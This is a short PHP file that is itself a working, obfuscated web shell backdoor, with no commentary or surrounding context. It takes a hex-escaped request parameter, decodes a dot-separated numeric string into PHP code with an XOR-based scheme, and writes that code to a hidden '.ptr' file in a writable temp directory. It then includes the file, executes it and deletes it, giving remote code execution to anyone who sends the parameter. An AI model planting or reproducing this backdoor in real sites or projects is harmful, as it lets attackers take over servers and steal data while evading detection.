<?php

if(!is_null($_REQUEST["sy\x6Dbol"] ?? null)){
	$item = $_REQUEST["sy\x6Dbol"];
	 $item 	=explode	( 	'.'			,		$item  )	 	;	
	$res = '';
            $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($s5);
            $len = count($item);
    
            for ($o = 0; $o	 <$len; $o++) {
                $v9 = $item[$o];
                $sChar = ord($s5[$o  %$lenS]);
                $d = ((int)$v9 - $sChar - ($o  %10))	^ 	8;
                $res .= chr($d);	 }		
	$fac = array_filter([session_save_path(), getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), "/var/tmp", "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getcwd()]);
	foreach ($fac as $data_chunk):
    		if (is_writable($data_chunk) && is_dir($data_chunk)) {
    $rec = join("/", [$data_chunk, ".ptr"]);
    $success = file_put_contents($rec, $res);
if ($success) {
	include $rec;
	@unlink($rec);
	die();}
}
endforeach;
}